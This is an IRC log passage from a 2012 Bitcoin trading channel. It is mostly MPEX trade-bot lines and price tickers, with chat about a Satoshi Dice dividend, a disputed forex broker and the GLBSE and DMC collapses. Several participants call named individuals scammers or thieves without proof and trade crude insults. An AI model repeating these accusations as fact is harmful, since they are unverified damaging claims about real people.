went defunct in 2004 Nov 03 22:55:07 huh Nov 03 22:55:08 [00:14:01] i showed that posts to my superior, teh boss, he was rolling of the floor. Nov 03 22:55:20 that was the reply Nov 03 22:55:25 rolling of the floor? Nov 03 22:55:57 dunno, maybe they rolled 'em together with carpet and hauled away, ya know Nov 03 22:56:07 heh Nov 03 23:02:54 this has all the makings of adventure Nov 03 23:03:16 [MPEX] [S.MPOE] 9020 @ 0.00048886 = 4.4095 BTC [-] Nov 03 23:04:12 i wasn't going to invest there anyway Nov 03 23:04:23 since he wasn't able to clearly explain me here how can one trade currencies with pure BTC balance and without need for any hedging, maybe you remember Nov 03 23:04:51 myeah Nov 03 23:04:52 but i did not suspect such wholesale scam, then Nov 03 23:05:32 myeah. kakobrekla you'll have to make an answer to that thing, it's ruining you. Nov 03 23:08:39 ;;rate patrickharnett -10 Scammer of the Peter Lambert school. See https://bitcointalk.org/index.php?topic=121915 Nov 03 23:08:41 Rating entry successful. Your rating of -10 for user patrickharnett has been recorded. Nov 03 23:28:25 [MPEX] [S.MPOE] 4380 @ 0.00048886 = 2.1412 BTC [-] Nov 03 23:28:26 [MPEX] [S.MPOE] 12935 @ 0.00048764 = 6.3076 BTC [-] Nov 03 23:51:07 fwiw, :o Nov 03 23:53:30 [MPEX] [S.MPOE] 15965 @ 0.00048764 = 7.7852 BTC [-] Nov 03 23:53:30 [MPEX] [S.MPOE] 7435 @ 0.00048759 = 3.6252 BTC [-] Nov 04 00:13:37 mircea_popescu, just to nitpick, who got the recent s.dice dividend ? it wasn't exactly divisible number :) Nov 04 00:14:39 and was it 1 satoshi or 94 as website shows? Nov 04 00:15:54 jurov here's the whole story : Nov 04 00:16:05 evoorhees sent 1 satoshi originally. predictably, nothing happened. Nov 04 00:16:21 so we talked and he sent 100. 94 of these were actually distributed, 6 were lost in rounding Nov 04 00:16:30 hehe Nov 04 00:16:31 if you had enough shares to qualify you got one (or more) else you got nothing Nov 04 00:16:44 there's no practical way to do better than that tho, so. Nov 04 00:17:39 ofc. just curious Nov 04 00:18:21 he should made a raffle for that 1 satoshi Nov 04 00:19:07 lol Nov 04 00:19:51 [MPEX] [S.MPOE] 9031 @ 0.00048759 = 4.4034 BTC [-] Nov 04 00:19:53 [MPEX] [S.MPOE] 28069 @ 0.0004875 = 13.6836 BTC [-] Nov 04 00:20:37 too many ppl won at s.dice this month? Nov 04 00:20:49 no, there was a bug Nov 04 00:21:08 you're in fact correct, in a sense :) Nov 04 00:22:11 :) Nov 04 00:22:15 ic Nov 04 00:25:47 what bug ?! Nov 04 00:28:07 ;;calc 2/94 Nov 04 00:28:07 0.0212765957447 Nov 04 00:28:15 ;P Nov 04 00:28:16 mircea, i remember rg boasting he is getting some bitcoins off sd that shouldn't be there Nov 04 00:29:09 seems to me that this recent dividend shows it's all going according to plan Nov 04 00:29:14 variance Nov 04 00:29:56 didn't it lose (hundreds|thousands) each month for a couple of months straight at the beginning? Nov 04 00:33:46 jurov: are you talking about the delay payment of winnings bug? Nov 04 00:34:45 'cause i don't think that bug cost them any money Nov 04 00:34:54 dunno. my memory tries to convince me there was some sd leak last month Nov 04 00:35:43 scumbag memory. there isn't anyhing in logs. Nov 04 00:36:25 heh, scumbag memory, well, if you do come across something like a money losing bug, i'd like to know :) Nov 04 00:38:40 jurov iirc rg was just being lucky. Nov 04 00:38:43 oh wait found something Nov 04 00:38:52 [21:12:37] hm i think satoshidice just messed up Nov 04 00:39:07 [21:13:00] it was meant to send me .8 btc if it was a winner Nov 04 00:39:20 [21:13:03] it sent 1.2 btc Nov 04 00:40:16 [21:13:39] that's what i use satoshidice for now Nov 04 00:40:28 [21:13:44] i take like .1 btc Nov 04 00:40:41 [21:13:48] and turn it into 1.5 Nov 04 00:40:53 [21:13:57] its worked 3 days in a row Nov 04 00:41:17 dunno which day that was, should be sometime in october Nov 04 00:42:07 to me smells like a bug Nov 04 00:42:28 iirc it was in like august Nov 04 00:43:31 whatever. Nov 04 00:44:00 was this b/f or after rg learned simple arithmetic Nov 04 00:45:00 [MPEX] [S.MPOE] 8931 @ 0.0004875 = 4.3539 BTC [-] Nov 04 00:45:02 [MPEX] [S.MPOE] 33400 @ 0.00048745 = 16.2808 BTC [-] Nov 04 00:45:03 [MPEX] [S.MPOE] 14069 @ 0.00048734 = 6.8564 BTC [-] Nov 04 00:46:01 right below that is link to "shareholders on welfare" article that is dated October 22 Nov 04 00:46:18 so it certainly wasn't in august. Nov 04 00:49:27 so this is what i have. or am i really a conspiration nut? Nov 04 00:51:16 or if rg's broken arithmetic is paying him lunches, i wanna some too Nov 04 00:54:43 jurov i recall rg saying he's making money on sd back in aug or so Nov 04 00:54:47 this may be different set. Nov 04 00:55:09 but anyway, i don't think there's any bug, just variance. Nov 04 00:56:51 what are the odds to turn 0.1 btc into a lunch three times in row? Nov 04 00:57:13 just variance? Nov 04 00:57:38 well you see, the house edge is just 1% or so Nov 04 00:57:49 but if you apply l'hospital you can calculate the odds Nov 04 01:00:03 woah, i have 32 bux in unpaid adsense Nov 04 01:00:18 last i checked i had less than 5 Nov 04 01:02:08 oh wait Nov 04 01:02:12 nvm Nov 04 01:03:23 winning 0.1->12.5 btc is equivalent to "lessthan 512" with win odds of 0.7813% Nov 04 01:03:49 dunno how can rg or l'hospital make a consistent strategy from it Nov 04 01:06:06 no it was 0.1->1.5 btc that's "lessthan 4000" with win odds of 6.1% ...still Nov 04 01:06:30 my brain is shutting down, too late Nov 04 01:08:20 smickles: which pays better, bitcoin ad networks or adsense? Nov 04 01:08:26 any idea? Nov 04 01:10:21 [MPEX] [S.MPOE] 18650 @ 0.00048854 = 9.1113 BTC [+] Nov 04 01:23:12 Anduck: i can't answer that without lying or researching, and I'm not doing either right now ;) Nov 04 01:23:24 alright. Nov 04 01:23:27 thanks still! Nov 04 01:24:43 jurov l'hospital just tells you what are the odds of a certain distribution based on the odds of the process Nov 04 01:25:07 for isntance if you toss a coin, you can use l'hospital to calculate the odds of getting three heads in a row followed by four tails in a row Nov 04 01:35:50 [MPEX] [S.MPOE] 17150 @ 0.00048734 = 8.3579 BTC [-] Nov 04 01:39:40 ;;ticker Nov 04 01:39:42 BTCUSD ticker | Best bid: 10.56501, Best ask: 10.64199, Bid-ask spread: 0.07698, Last trade: 10.64200, 24 hour volume: 16450.39563539, 24 hour low: 10.40000, 24 hour high: 10.65000, 24 hour vwap: 10.53359 Nov 04 01:42:21 ;;ticker Nov 04 01:42:22 BTCUSD ticker | Best bid: 10.56501, Best ask: 10.64199, Bid-ask spread: 0.07698, Last trade: 10.64200, 24 hour volume: 16450.39563539, 24 hour low: 10.40000, 24 hour high: 10.65000, 24 hour vwap: 10.53359 Nov 04 01:43:29 ;;tricker Nov 04 01:43:29 Error: "tricker" is not a valid command. Nov 04 01:43:32 pfff Nov 04 01:43:35 districkination. Nov 04 01:48:51 ;;tickler Nov 04 01:48:51 Error: "tickler" is not a valid command. Nov 04 01:49:03 pff, distraction Nov 04 01:53:11 lol Nov 04 01:58:30 omg Nov 04 01:58:52 there was an f.giga trade yesterday? Nov 04 02:02:06 mircea_popescu: it looks as if, when I launch the thing, my bot will beat your bot by about .02btc on some strikes (if it were running now Nov 04 02:02:10 ) Nov 04 02:02:31 define beat ? Nov 04 02:02:38 offer a better price Nov 04 02:03:49 [MPEX] [S.MPOE] 4350 @ 0.00048854 = 2.1251 BTC [+] Nov 04 02:03:50 [MPEX] [S.MPOE] 10547 @ 0.00048902 = 5.1577 BTC [+] Nov 04 02:03:51 [MPEX] [S.MPOE] 11603 @ 0.00048958 = 5.6806 BTC [+] Nov 04 02:10:30 I just love how my ideas for bots are so plain and simple, Nov 04 02:10:50 but by the time that simple idea is translated into code, Nov 04 02:11:27 it's this complex leviathan floating around and eating worlds Nov 04 02:17:10 although, part of that may be due to the vagaries of english Nov 04 02:27:39 smickles! Nov 04 02:28:08 monopoly today? Nov 04 02:30:16 [MPEX] [S.MPOE] 43200 @ 0.00048833 = 21.0959 BTC [-] Nov 04 02:30:18 [MPEX] [S.MPOE] 1250 @ 0.00048734 = 0.6092 BTC [-] Nov 04 02:38:16 smickles i see. WAR!!1 Nov 04 02:45:57 no wars please Nov 04 02:56:09 [MPEX] [S.MPOE] 14400 @ 0.00048958 = 7.05 BTC [+] Nov 04 03:05:53 ;;ticker Nov 04 03:05:53 BTCUSD ticker | Best bid: 10.59098, Best ask: 10.59998, Bid-ask spread: 0.00900, Last trade: 10.59098, 24 hour volume: 16062.37847763, 24 hour low: 10.40000, 24 hour high: 10.67000, 24 hour vwap: 10.54632 Nov 04 03:06:04 ;;ticker Nov 04 03:06:04 BTCUSD ticker | Best bid: 10.59098, Best ask: 10.59998, Bid-ask spread: 0.00900, Last trade: 10.59098, 24 hour volume: 16062.37847763, 24 hour low: 10.40000, 24 hour high: 10.67000, 24 hour vwap: 10.54632 Nov 04 03:06:22 ;;ticker Nov 04 03:06:22 BTCUSD ticker | Best bid: 10.59098, Best ask: 10.59998, Bid-ask spread: 0.00900, Last trade: 10.59098, 24 hour volume: 16012.84847763, 24 hour low: 10.40000, 24 hour high: 10.67000, 24 hour vwap: 10.54670 Nov 04 03:11:29 thestrin1puller: this war would result in better option premiums for you Nov 04 03:16:34 ;;ticker Nov 04 03:16:35 BTCUSD ticker | Best bid: 10.60000, Best ask: 10.63999, Bid-ask spread: 0.03999, Last trade: 10.60000, 24 hour volume: 16067.85771280, 24 hour low: 10.40000, 24 hour high: 10.67000, 24 hour vwap: 10.54722 Nov 04 03:16:38 ;;bc,24hprc Nov 04 03:16:39 10.49 Nov 04 03:21:27 [MPEX] [S.MPOE] 22597 @ 0.00048958 = 11.063 BTC [+] Nov 04 03:21:29 [MPEX] [S.MPOE] 10753 @ 0.00049099 = 5.2796 BTC [+] **** BEGIN LOGGING AT Sun Nov 4 10:09:20 2012 Nov 04 10:09:29 [MPEX] [S.MPOE] 6536 @ 0.00049267 = 3.2201 BTC [-] Nov 04 10:34:57 [MPEX] [S.MPOE] 10850 @ 0.00048792 = 5.2939 BTC [-] Nov 04 11:01:09 [MPEX] [S.MPOE] 9250 @ 0.00048792 = 4.5133 BTC [-] Nov 04 11:01:11 [MPEX] [S.MPOE] 25687 @ 0.00048778 = 12.5296 BTC [-] Nov 04 11:01:12 [MPEX] [S.MPOE] 710 @ 0.00048636 = 0.3453 BTC [-] Nov 04 11:26:21 [MPEX] [S.MPOE] 20833 @ 0.00048636 = 10.1323 BTC [-] Nov 04 11:26:22 [MPEX] [S.MPOE] 27386 @ 0.00048632 = 13.3184 BTC [-] Nov 04 11:51:25 [MPEX] [S.MPOE] 1414 @ 0.00048632 = 0.6877 BTC [-] Nov 04 11:51:27 [MPEX] [S.MPOE] 15695 @ 0.000486 = 7.6278 BTC [-] Nov 04 12:16:35 [MPEX] [S.MPOE] 8955 @ 0.000486 = 4.3521 BTC [-] Nov 04 12:16:36 [MPEX] [S.MPOE] 13795 @ 0.00048591 = 6.7031 BTC [-] Nov 04 12:41:56 [MPEX] [S.MPOE] 20055 @ 0.00048591 = 9.7449 BTC [-] Nov 04 12:41:58 [MPEX] [S.MPOE] 19145 @ 0.00048587 = 9.302 BTC [-] Nov 04 13:07:03 [MPEX] [S.MPOE] 16855 @ 0.00048587 = 8.1893 BTC [-] Nov 04 13:07:05 [MPEX] [S.MPOE] 1335 @ 0.00048581 = 0.6486 BTC [-] Nov 04 13:21:32 http://www.ecb.europa.eu/pub/pdf/other/virtualcurrencyschemes201210en.pdf Nov 04 13:22:37 hehehe Nov 04 13:22:48 still no legal placement Nov 04 13:22:51 ;) Nov 04 13:32:06 [MPEX] [S.MPOE] 33565 @ 0.00048581 = 16.3062 BTC [-] Nov 04 13:32:07 [MPEX] [S.MPOE] 10635 @ 0.00048576 = 5.1661 BTC [-] Nov 04 13:57:43 [MPEX] [S.MPOE] 16950 @ 0.00048576 = 8.2336 BTC [-] Nov 04 14:22:52 [MPEX] [S.MPOE] 17815 @ 0.00048576 = 8.6538 BTC [-] Nov 04 14:22:54 [MPEX] [S.MPOE] 2235 @ 0.00048564 = 1.0854 BTC [-] Nov 04 14:49:07 [MPEX] [S.MPOE] 12200 @ 0.00048564 = 5.9248 BTC [-] Nov 04 15:14:23 [MPEX] [S.MPOE] 15050 @ 0.00048564 = 7.3089 BTC [-] Nov 04 15:39:34 [MPEX] [S.MPOE] 28965 @ 0.00048564 = 14.0666 BTC [-] Nov 04 15:39:35 [MPEX] [S.MPOE] 7549 @ 0.00048561 = 3.6659 BTC [-] Nov 04 15:39:37 [MPEX] [S.MPOE] 8479 @ 0.00048526 = 4.1145 BTC [-] Nov 04 16:04:42 [MPEX] [S.MPOE] 32650 @ 0.00048794 = 15.9312 BTC [+] Nov 04 16:30:11 [MPEX] [S.MPOE] 5621 @ 0.00048526 = 2.7276 BTC [-] Nov 04 16:30:13 [MPEX] [S.MPOE] 22484 @ 0.00048525 = 10.9104 BTC [-] Nov 04 16:34:22 rillions of dollars worth of stock certificates and other paper securities that were stored in a vault in lower Manhattan may have suffered water damage from Superstorm Sandy. Nov 04 16:34:23 awww Nov 04 16:55:31 [MPEX] [S.MPOE] 3277 @ 0.00048794 = 1.599 BTC [+] Nov 04 17:20:48 [MPEX] [S.MPOE] 10450 @ 0.00048958 = 5.1161 BTC [+] Nov 04 17:46:00 [MPEX] [S.MPOE] 9423 @ 0.00048958 = 4.6133 BTC [+] Nov 04 18:11:56 [MPEX] [S.MPOE] 19433 @ 0.00048525 = 9.4299 BTC [-] Nov 04 18:11:57 [MPEX] [S.MPOE] 16467 @ 0.00048511 = 7.9883 BTC [-] Nov 04 18:37:49 [MPEX] [S.MPOE] 7900 @ 0.00048511 = 3.8324 BTC [-] Nov 04 18:54:36 finally got my hands on http://shrani.si/f/19/sx/1C48WCzZ/imag0254.jpg Nov 04 18:57:06 how's the forex stuff going kakobrekla? Nov 04 18:57:14 excellent Nov 04 18:58:02 nice. good respons from bitcoin folks? Nov 04 18:58:22 idiots without money who cant do math say its a scam, the rest of the folks is making money Nov 04 18:58:25 the usual. Nov 04 18:58:44 cool Nov 04 18:59:14 the best trader is enky by far tho Nov 04 18:59:19 he is up almost 50% now Nov 04 18:59:38 he really stands out. Nov 04 19:03:07 [MPEX] [S.MPOE] 16400 @ 0.00048574 = 7.9661 BTC [+] Nov 04 19:19:16 kakobrekla: interesting read. Thank you for the link Nov 04 19:20:11 yw :) Nov 04 19:28:35 [MPEX] [S.MPOE] 1033 @ 0.00048511 = 0.5011 BTC [-] Nov 04 19:28:36 [MPEX] [S.MPOE] 18037 @ 0.00048499 = 8.7478 BTC [-] Nov 04 19:41:36 kakobrekla, that's not exactly what i was expecting to hear, you know Nov 04 19:49:35 yeah well, it is what it is. Nov 04 19:54:03 [MPEX] [S.MPOE] 22627 @ 0.00048574 = 10.9908 BTC [+] Nov 04 19:54:05 [MPEX] [S.MPOE] 19673 @ 0.00048642 = 9.5693 BTC [+] Nov 04 19:56:48 i don't get it. that website lifted off the insignia from the real winner and is using someone else's fsa number Nov 04 19:56:58 you don't see a problem with this because "everyone is making money" ? Nov 04 19:57:13 its not someone elses fsa Nov 04 19:57:28 isn't it ? Nov 04 19:57:33 nope Nov 04 19:57:49 well how are people to know this ?! Nov 04 19:58:16 i told it in the thread and its clear if one intalls MT4 Nov 04 19:58:31 i must have missed that. Nov 04 19:58:39 [12:56:52] i don't get it. that website lifted off the insignia from the real winner and is using someone else's fsa number Nov 04 19:58:39 ? Nov 04 19:59:54 that bottom logo though, yea it should be replaced with a more apropriate one - they wanted to have some mt4 award listed Nov 04 19:59:56 Diablo-D3 this bit4x thing Nov 04 20:00:02 what is it Nov 04 20:00:35 Diablo-D3, https://bitcointalk.org/index.php?topic=114818.0;topicseen Nov 04 20:00:58 damn, I cant lock the thread. Nov 04 20:01:13 why lock the thread ? Nov 04 20:01:18 scam Nov 04 20:01:23 ... Nov 04 20:01:24 :D Nov 04 20:03:37 so who's worthitfs.com ?! Nov 04 20:04:18 http://shrani.si/f/3E/3n/49Dt3vRo/vfx.png Nov 04 20:04:30 venetfx is brandname Nov 04 20:05:00 that's a virtual offices address ;/ Nov 04 20:05:13 so? Nov 04 20:05:21 so its probably a scam Nov 04 20:05:23 http://www.bobbear.co.uk/finance.html Nov 04 20:05:29 mircea_popescu, how can you tell? Nov 04 20:05:41 drekk i know things in london. Nov 04 20:05:45 cause they live in slovenia? Nov 04 20:05:48 ok Nov 04 20:06:21 i know them for about a year now Nov 04 20:06:44 i wouldnt go out on this if i wasnt sure whats happenin Nov 04 20:07:00 also, i keep all deposits and now they want me to keep the profits too Nov 04 20:07:11 which i kinda hate but well see Nov 04 20:07:51 so the story here is, some people you know irl rented out offices from virtual-serviced-offices.co.uk Nov 04 20:08:01 and what, bought the defunct worth it company ? Nov 04 20:09:22 dunno what was bought at which point but i can ask if you really wanna know Nov 04 20:09:53 i absolutely want to know yes. Nov 04 20:10:52 sure ill ask. Nov 04 20:11:12 you can check its not a bucketshop - admd is the currenex link provider Nov 04 20:12:28 honestly, there's two constructions that can be made on the data as-is. either these are some kids with a bright idea and absolutely no clue on how these things work, or else it's as deep as the tar pit goes. Nov 04 20:12:52 but putting awards and fsa numbers on a site that can't be backed up is asking for trouble Nov 04 20:12:56 gratuitously, i might add. Nov 04 20:13:31 the guy in charge was in the pit in the states for ~20 years Nov 04 20:13:39 came back to his home Nov 04 20:13:45 few years ago Nov 04 20:13:49 so put some proof about THAT to the site Nov 04 20:14:03 not whatever you have there now Nov 04 20:18:29 and of course, explaining how one can trade currencies without any conversions from/to bitcoin whatsoever would help much Nov 04 20:18:46 seriosuly? Nov 04 20:18:50 you dont get it? Nov 04 20:19:25 [MPEX] [S.MPOE] 7205 @ 0.00048642 = 3.5047 BTC [+] Nov 04 20:19:27 [MPEX] [S.MPOE] 1745 @ 0.00049032 = 0.8556 BTC [+] Nov 04 20:19:30 i don't indeed. and i'm not alone. similar transparency like MPOE business model - only "secret sauce" is their bot's pricing Nov 04 20:19:39 the other thing, i havent mentione, i dont get paid from people who blow their acounts or cant do math Nov 04 20:20:06 there is no iniciative for me to have gather forex newbs on this Nov 04 20:20:36 that's no proof. and then, why do you advertise at btctalk? Nov 04 20:21:02 one banner for 0.11 Nov 04 20:21:04 cant hurt. Nov 04 20:21:14 that was all. Nov 04 20:21:55 while even MPOE-PR did patiently explain their stuff, you're apparently too good for that. Nov 04 20:22:48 well some people seem to understand it all from the info on the site, if one cant, i advise against forex trading in any denomination. Nov 04 20:23:34 this is not bitcoinica Nov 04 20:25:49 fair enough. too many red flags for me. not touching it. Nov 04 20:26:42 lol @even mpoe-pr Nov 04 20:26:48 what, the girl's the standard of evil ? Nov 04 20:27:24 haha, i like to use her as such Nov 04 20:27:27 no, for really shitty PR Nov 04 20:28:12 mircea_popescu: when is SEC going after your hairy ass for offering unreg. sec for US citizens? :) Nov 04 20:28:38 i dunno, im still waiting for the child porn people. Nov 04 20:28:40 Mircea_Dotcom Nov 04 20:28:50 lol Nov 04 20:28:56 or w/e pressures there were going to be last month Nov 04 20:29:04 as announced by glbse folks Nov 04 20:29:11 lol Nov 04 20:29:45 fuck, I forgot to ask James for the agents name Nov 04 20:30:29 what agent ? Nov 04 20:32:05 FSA Nov 04 20:32:15 who told him to close down or Nov 04 20:32:28 brrr... this is low https://bitcointalk.org/index.php?topic=114818.msg1313374#msg1313374 Nov 04 20:32:56 hm shitload of posts seem to be deleted Nov 04 20:33:11 NBC was hacked, LOL: http://www.nbc.com/saturday-night-live/ Nov 04 20:36:22 bwahahahah Nov 04 20:36:23 oh man Nov 04 20:36:41 https://bitcointalk.org/index.php?topic=79637.msg1316522#msg1316522 Nov 04 20:36:47 he tries to call me out Nov 04 20:36:49 lolololol Nov 04 20:38:54 i see the asic drama is still going strong Nov 04 20:40:31 Diablo-D3: callin you out is not that hard :) How's your solar farm business doing? Nov 04 20:41:10 EskimoBob: I see what you did thar. Nov 04 20:45:12 [MPEX] [S.MPOE] 26863 @ 0.00048499 = 13.0283 BTC [-] Nov 04 20:45:13 [MPEX] [S.MPOE] 14534 @ 0.00048487 = 7.0471 BTC [-] Nov 04 20:45:15 [MPEX] [S.MPOE] 12603 @ 0.00048485 = 6.1106 BTC [-] Nov 04 20:45:28 MeSarah post is long and I do not really care about all the mining blaablaa at the moment Nov 04 20:46:27 it still amazes me what those lunatics are willing to invest and do just to make 1 USD per day an hope they can get their "investment" back in a year or never Nov 04 20:54:31 people will do anything to be in. Nov 04 20:55:56 EskimoBob: yeah, I could make more money on the fucking stock market Nov 04 20:56:17 you or in general ?! Nov 04 20:56:32 mircea_popescu: in general Nov 04 20:56:40 Im not claiming some super secret investment strategy here Nov 04 20:58:41 " Diablo-D3 | EskimoBob: yeah, I could make more money on the fucking stock market " - Diablo-D3: mmm... sure you can. Do I really need to remind you of your fabulous investment portfolio, where you managed to piss away close to 90% of investors money? :) LOL Nov 04 20:59:19 not really, because it never happened Nov 04 20:59:26 i was told you can code. Code then and make money with that Nov 04 20:59:42 although the hilarious part is nefario may end up paying for it in the end for lying to everyone Nov 04 21:00:04 dude, you are like usagi :) Nov 04 21:00:08 I like how he used a fake shutdown of DMC to stall for time too Nov 04 21:00:19 he knew what was happening long before he attacked DMC Nov 04 21:01:11 why didn';t you say anything ? Nov 04 21:02:04 btw, where is this little shit bird usagi hiding now days? Nov 04 21:02:26 ;;seen usagi Nov 04 21:02:27 usagi was last seen in #bitcoin-assets 2 weeks, 5 days, 3 hours, 40 minutes, and 44 seconds ago: i don't come on irc much anymore because i am sick, but i will be back later. Nov 04 21:02:36 cancer? Nov 04 21:02:49 mircea_popescu: Diablo-D3 did not know shit and the shut down was requested by form members because thy realized that Diablo-D3 is pissing the coins away Nov 04 21:03:17 mircea_popescu: I said lots of things. No one listened. Nov 04 21:03:24 kakobrekla: no, serious yellow fever Nov 04 21:03:25 in the end, I was proven right Nov 04 21:03:38 i was expecting someone to say aids. Nov 04 21:03:39 nefario personally walked off with about 2k of DMC's money. Nov 04 21:03:50 he was scamming some poor fuck for CC payment so he can join some jap web site Nov 04 21:04:28 Diablo-D3: DMC had no BTC left at least it was not visible in the statements you published Nov 04 21:05:24 EskimoBob: since the paper of other companies is now worthless, he is obligated to fix this. Nov 04 21:05:32 he is also obligated to repay the DMC investors in full. Nov 04 21:05:38 LOL Nov 04 21:05:39 hold your breath for that Nov 04 21:05:47 I will also accept prison time as an acceptable method of repayment. Nov 04 21:06:02 And hes not going to be able to talk his way out of that one Nov 04 21:06:22 Diablo-D3: you sold unreg's sec for US citizens, are you guys going to share a cell? Nov 04 21:06:48 EskimoBob: nope, I sold nothing. Nov 04 21:06:56 really? Nov 04 21:06:58 not this again Nov 04 21:07:02 and nefario as lied about the legality of glbse Nov 04 21:07:15 I am not responsible for his actions, and I never will be. Nov 04 21:07:33 He fucked every Bitcoin user, no matter if they invested in GLBSE or not, no mater if they invested in DMC or not Nov 04 21:07:35 no Diablo-D3, only your actions :) Nov 04 21:07:40 Im not sure why you're standing up for that twat. Nov 04 21:07:56 no, that was Trendon, who fucked every BTC user Nov 04 21:08:14 I am not standing for that twat at all Nov 04 21:08:30 DMC would have legitimized Bitcoin as a way to crowdfund small businesses Nov 04 21:08:35 and now we dont have that. Nov 04 21:08:46 part of glbse trouble might be ppt's but im not saying nefario is free to walk like he did Nov 04 21:08:51 BTC could have reached $100 by the end of next year, and now it probably wont. Nov 04 21:09:01 really? Nov 04 21:09:04 nefario screwed us badly. Nov 04 21:09:32 did you forget all about that shitbag Trendon? Nov 04 21:09:43 he is the guy who really fucked us all. Nov 04 21:09:55 just because trendon is a shitbacg in no way whatsoever excuses nefario Nov 04 21:10:05 GLBSE crap can be fixed, what trendon and his friends did... can not Nov 04 21:10:14 everything can be fixed. Nov 04 21:10:30 [MPEX] [S.MPOE] 2549 @ 0.00048485 = 1.2359 BTC [-] Nov 04 21:10:32 [MPEX] [S.MPOE] 29570 @ 0.0004848 = 14.3355 BTC [-] Nov 04 21:10:36 EskimoBob: which one was Trendon again? Nov 04 21:10:45 aspirate. Nov 04 21:10:51 just say pirate damnit Nov 04 21:10:53 glbse cannot be fixed. even if james returns the asset lists, which it reasonably appears he never will, most of those projects are screwed Nov 04 21:11:07 pigeons: yes, DMC wont be starting back up no matter what Nov 04 21:11:13 Im slowly going to buy back shares, and then thats it Nov 04 21:11:14 folks, be glad it happened now. if any of it happened after bitcoin is legally recognized, that would be shit on completely different level Nov 04 21:11:17 Diablo-D3: don't try to be cute Nov 04 21:11:26 EskimoBob: I dont do real name shit Nov 04 21:11:30 pigeons fixing means fixing you know ? Nov 04 21:11:38 and I never paid attention to the pirate shit anyhow Nov 04 21:11:46 I told people it was a scam from the beginning, they didnt listen, thats their own problem Nov 04 21:12:05 lol this dude's fascinating. Nov 04 21:12:12 yeah, but people got back more money of pirate than DMC Nov 04 21:12:17 so you told everyone about glbse, and pirate and what else ?! Nov 04 21:12:28 no sandy ? Nov 04 21:12:46 mircea_popescu: I never said anything about glbse, you did Nov 04 21:13:12 let's just all decide the same person to hate on Nov 04 21:13:27 lol Nov 04 21:13:38 gmaxwell. Nov 04 21:13:43 mircea_popescu: and yes, I should have listened and I didnt Nov 04 21:14:23 well there's always tomorro Nov 04 21:35:58 [MPEX] [S.MPOE] 41359 @ 0.00048845 = 20.2018 BTC [+] Nov 04 21:35:59 [MPEX] [S.MPOE] 7241 @ 0.00049032 = 3.5504 BTC [+] Nov 04 22:02:00 [MPEX] [S.MPOE] 22500 @ 0.00048552 = 10.9242 BTC [-] Nov 04 22:27:11 [MPEX] [S.MPOE] 24830 @ 0.0004848 = 12.0376 BTC [-] Nov 04 22:27:13 [MPEX] [S.MPOE] 16669 @ 0.00048478 = 8.0808 BTC [-] Nov 04 22:27:13 [MPEX] [S.MPOE] 26000 @ 0.00048475 = 12.6035 BTC [-] Nov 04 22:27:14 [MPEX] [S.MPOE] 2253 @ 0.00048467 = 1.092 BTC [-] Nov 04 22:52:15 [MPEX] [S.MPOE] 19500 @ 0.00048552 = 9.4676 BTC [+] Nov 04 22:52:16 [MPEX] [S.MPOE] 10000 @ 0.00048842 = 4.8842 BTC [+] Nov 04 23:09:31 hello all, what is good? Nov 04 23:11:02 hi Nov 04 23:11:05 bitcoin is good. Nov 04 23:11:28 indeed! Nov 04 23:17:59 [MPEX] [S.MPOE] 14650 @ 0.00048574 = 7.1161 BTC [-] Nov 04 23:43:00 [MPEX] [S.MPOE] 5185 @ 0.00048571 = 2.5184 BTC [-] Nov 05 00:08:31 [MPEX] [S.MPOE] 7300 @ 0.00048718 = 3.5564 BTC [+] Nov 05 00:18:41 ;;ticker Nov 05 00:18:42 BTCUSD ticker | Best bid: 10.55001, Best ask: 10.59500, Bid-ask spread: 0.04499, Last trade: 10.59970, 24 hour volume: 10630.99680636, 24 hour low: 10.51002, 24 hour high: 10.68000, 24 hour vwap: 10.59514 Nov 05 00:18:49 bad bitcoin, no biscuit Nov 05 00:27:10 10 is nice to calculate, good price Nov 05 00:28:14 well tbh 1 is even easier :) Nov 05 00:34:01 [MPEX] [S.MPOE] 46784 @ 0.00048632 = 22.752 BTC [-] Nov 05 00:34:02 [MPEX] [S.MPOE] 10866 @ 0.00048528 = 5.2731 BTC [-] **** BEGIN LOGGING AT Mon Nov 5 09:22:57 2012 Nov 05 09:23:12 ahh good mornin bitcoinland Nov 05 09:33:03 [MPEX] [S.MPOE] 19343 @ 0.00048697 = 9.4195 BTC [+] **** ENDING LOGGING AT Mon Nov 5 10:00:56 2012 **** BEGIN LOGGING AT Mon Nov 5 10:01:21 2012 Nov 05 10:01:44 -NickServ- You failed to identify in time for the nickname mircea_popescu **** ENDING LOGGING AT Mon Nov 5 10:19:44 2012 **** BEGIN LOGGING AT Mon Nov 5 10:21:57 2012 Nov 05 10:23:52 [MPEX] [S.MPOE] 16000 @ 0.00049048 = 7.8477 BTC [+] Nov 05 10:23:53 [MPEX] [S.MPOE] 11700 @ 0.00049077 = 5.742 BTC [+] Nov 05 10:34:16 mircea_popescu: you mean "good night" Nov 05 10:34:45 why ? Nov 05 10:34:48 tis like 10am here Nov 05 10:49:59 [MPEX] [S.MPOE] 30300 @ 0.00048998 = 14.8464 BTC [-] Nov 05 11:11:04 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.16722208 = 167.2221 BTC [+] Nov 05 11:11:05 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.204652 = 204.652 BTC [-] Nov 05 11:11:07 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.25316149 = 253.1615 BTC [+] Nov 05 11:11:08 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.31316529 = 313.1653 BTC [+] Nov 05 11:11:09 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.38409025 = 384.0903 BTC [-] Nov 05 11:11:09 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.46571611 = 465.7161 BTC [-] Nov 05 11:11:10 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.55732244 = 557.3224 BTC [+] Nov 05 11:21:20 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.16717812 = 167.1781 BTC [-] Nov 05 11:21:21 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.20460891 = 204.6089 BTC [-] Nov 05 11:21:23 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.25312058 = 253.1206 BTC [-] Nov 05 11:21:24 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.3131282 = 313.1282 BTC [-] Nov 05 11:21:25 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.38405874 = 384.0587 BTC [-] Nov 05 11:21:25 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.46569154 = 465.6915 BTC [-] Nov 05 11:21:26 [MPEX] [O.BTCUSD.C060T] 